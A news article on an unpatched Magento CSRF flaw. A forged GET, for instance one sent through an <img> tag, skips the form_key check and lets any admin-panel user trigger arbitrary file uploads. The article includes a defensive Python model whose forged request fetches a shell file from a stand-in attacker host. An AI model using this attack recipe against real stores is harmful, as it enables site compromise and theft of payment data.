There is a serious vulnerability in a version of the Magento e-commerce platform that could allow a remote attacker to access a target site’s database.
The bug can be used for remote code execution, and the researchers who discovered it say they notified Magento of the vulnerability in November, but the company hasn’t released a fix yet. Magento’s platform is used by hundreds of thousands of sites for a variety of e-commerce functions. An attacker who successfully exploits the vulnerability could get access to whatever is stored in a compromised site’s database, such as payment card data.
The flaw is a cross-site request forgery (CSRF) weakness in the admin panel's remote image retrieval function: the request that tells Magento to fetch an image from a URL is not properly protected against forgery, and the fetched content ends up stored on the server as an arbitrary file.
“By changing the request method from POST to GET, a lack of a form_key parameter which serves as a CSRF token will be ignored and thus enable cross-site request forgery (CSRF) attacks. The attack can be constructed as simple as <img src=… in an email or a public message board, which will automatically trigger the arbitrary file upload if a user is currently logged into Magento. An attacker can also entice the user to open a CSRF link using social engineering,” the advisory from DefenseCode says.
Besides the CSRF vector, which depends on luring a logged-in user to a forged link, the vulnerability can be exploited directly by any authenticated admin-panel user. That user does not need any special privileges to do so.
“Full administrative access is not required to exploit this vulnerability as any Magento administrative panel user regardless of assigned roles and permissions can access the remote image retrieval functionality. Therefore, gaining a low privileged access can enable the attacker to compromise the whole system or at very least, the database,” the advisory says.
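The following Python model, added here as an example and not DefenseCode's or Magento's code, shows the two failures the advisory describes: a CSRF token (form_key) that is only validated for POST, so a GET triggered by an `<img src=…>` tag skips the check, and an action reachable by any authenticated admin user regardless of role. The permission name, the example URLs and the session/request classes are assumptions; Magento's real handler is PHP and its ACL identifiers differ.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Hypothetical permission name; Magento's real ACL resource identifiers differ.
IMAGE_RETRIEVAL_PERMISSION = "media_gallery_remote_upload"


@dataclass
class Session:
    """Server-side session for a logged-in admin-panel user (constructed)."""
    user: str
    permissions: frozenset
    form_key: str = field(default_factory=lambda: secrets.token_urlsafe(16))


@dataclass
class Request:
    """The browser attaches the session cookie automatically, so a forged
    <img src=...> request arrives with the victim's session even though the
    attacker never sees that session or its form_key."""
    method: str
    params: dict
    session: Session


def fetch_remote_image(url):
    """Stand-in for the remote image retrieval action: records what would be
    fetched and stored instead of touching the network or the filesystem."""
    return {"stored": True, "source": url}


def _token_ok(req):
    supplied = req.params.get("form_key", "")
    return hmac.compare_digest(supplied.encode(), req.session.form_key.encode())


def vulnerable_handler(req):
    """Models the advisory's description: form_key is only checked on POST,
    so switching the request method to GET skips the check entirely, and
    any logged-in admin user may reach the action."""
    if req.method == "POST" and not _token_ok(req):
        return 403, {"error": "invalid form_key"}
    return 200, fetch_remote_image(req.params.get("url", ""))


def hardened_handler(req):
    """Rejects non-POST requests before anything else, validates the token on
    every state-changing request, and requires an explicit permission so a
    low-privileged admin user cannot reach the upload path."""
    if req.method != "POST":
        return 405, {"error": "state-changing action requires POST"}
    if not _token_ok(req):
        return 403, {"error": "invalid form_key"}
    if IMAGE_RETRIEVAL_PERMISSION not in req.session.permissions:
        return 403, {"error": "permission denied"}
    return 200, fetch_remote_image(req.params.get("url", ""))


def forged_get(victim):
    """What the victim's browser sends when it renders an attacker-controlled
    <img src="https://shop.example/admin/...?url=..."> tag: a GET carrying the
    victim's session and no form_key. URLs are constructed examples."""
    return Request("GET", {"url": "https://attacker.example/shell.php"}, victim)


def legitimate_post(user, url):
    """The request the user's own admin-panel form would produce."""
    return Request("POST", {"url": url, "form_key": user.form_key}, user)


if __name__ == "__main__":
    low_priv = Session("reports-only", frozenset({"reports_view"}))
    print("vulnerable, forged GET:", vulnerable_handler(forged_get(low_priv)))
    print("hardened,   forged GET:", hardened_handler(forged_get(low_priv)))
```

Note that the hardened handler checks the HTTP method first: a token check that runs only inside the POST branch is exactly the pattern the advisory describes being bypassed, and a separate role check is what stops a low-privileged panel user from using the feature even with a valid token.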
This vulnerability affects the Community Edition release of Magento, which is an open source version meant for small businesses and developers.
Image: Guilherme Tavares, CC BY license.